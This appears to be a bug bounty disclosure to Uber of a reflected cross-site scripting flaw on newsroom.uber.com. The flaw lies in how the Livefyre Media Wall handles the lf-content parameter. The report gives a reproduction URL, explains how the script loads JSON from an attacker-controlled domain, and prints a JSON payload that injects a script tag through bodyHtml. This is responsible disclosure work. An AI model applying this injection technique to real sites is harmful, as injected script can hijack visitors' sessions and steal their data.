Reflected XSS via Livefyre Media Wall in newsroom.uber.com

Hello @uber, This vulnerability works in all sites where there [Livefyre Media Wall](http://web.livefyre.com/apps/mediawall/ "Livefyre Media Wall"), including [newsroom.uber.com](https://newsroom.uber.com/ "Uber News"). To reproduce this Cross-Site Scripting, visit this URL: https://newsroom.uber.com/?lf-content=danylod.com/uber.php?:131560603:307477931 Vulnerable is this source code: https://cdn.livefyre.com/libs/streamhub-permalink/v0.4.1/streamhub-permalink.min.js Parameter `lf-content` can be controlled to load JSON file as follows: ``` lf-content=controlled-domain:GET parameter 'collection_id':GET parameter 'content_id' ``` Browser try to upload content from: ``` https://bootstrap.controlled-domain/api/v3.0/content/thread/?collection_id=GET+parameter+'collection_id'&content_id=GET+parameter+'content_id'&depth_only=false ``` So, on https://bootstrap.danylod.com/uber.php i placed this JSON content: ``` { "status": "ok", "code": 200, "data": { "content": [ { "source": 0, "collectionId": "131560603", "content": { "generator": { "id": "livefyre.com" }, "bodyHtml": "<marquee>XSS</marquee><script>alert(\"XSS on \"+ document.domain)</script>", "annotations": { "likedBy": [ "[email protected]" ] }, "authorId": "[email protected]", "createdAt": 1431144598, "parentId": "307291329", "updatedAt": 1431144598, "id": "307477931", "ancestorId": "307291329" }, "vis": 1, "type": 0, "event": 1431269111210110 } ], "meta": { "page": 0 }, "authors": { "[email protected]": { "displayName": "MDV", "tags": [], "profileUrl": "https://hackerone.com/mdv", "avatar": "https://bootstrap.danylod.com/mdv.png", "type": 1, "id": "[email protected]" } } } } ``` Via JSON parameter `bodyHtml` i can inject HTML code, see screenshot F89055\.